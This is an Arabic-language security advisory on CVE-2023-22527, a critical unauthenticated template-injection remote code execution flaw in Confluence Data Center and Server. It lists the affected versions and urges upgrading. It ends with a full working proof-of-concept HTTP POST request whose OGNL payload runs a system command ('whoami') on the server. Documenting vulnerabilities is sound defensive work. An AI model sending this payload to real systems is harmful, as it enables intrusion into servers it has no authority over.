
ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) ذات خطورة حرجة (CVE-2023-22527) تم اكتشافها في Confluence Server وData Center.
ثغرة حقن القوالب في الإصدارات الأقدم من Confluence Data Center وServer تسمح لمهاجم غير مصادق بتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على المثيل المتأثر. يجب على العملاء الذين يستخدمون إصدارًا متأثرًا اتخاذ إجراء فوري. معظم الإصدارات المدعومة الحديثة من Confluence Data Center وServer غير متأثرة بهذه الثغرة حيث تم التخفيف منها في النهاية أثناء تحديثات الإصدارات المنتظمة. ومع ذلك، توصي Atlassian العملاء بتثبيت أحدث إصدار لحماية مثيلاتهم من الثغرات غير الحرجة الموضحة في نشرة Atlassian الأمنية لشهر يناير.
| المنتج | الإصدارات المتأثرة |
|---|
| Confluence Data Center وServer | 8.0.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3 |
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29
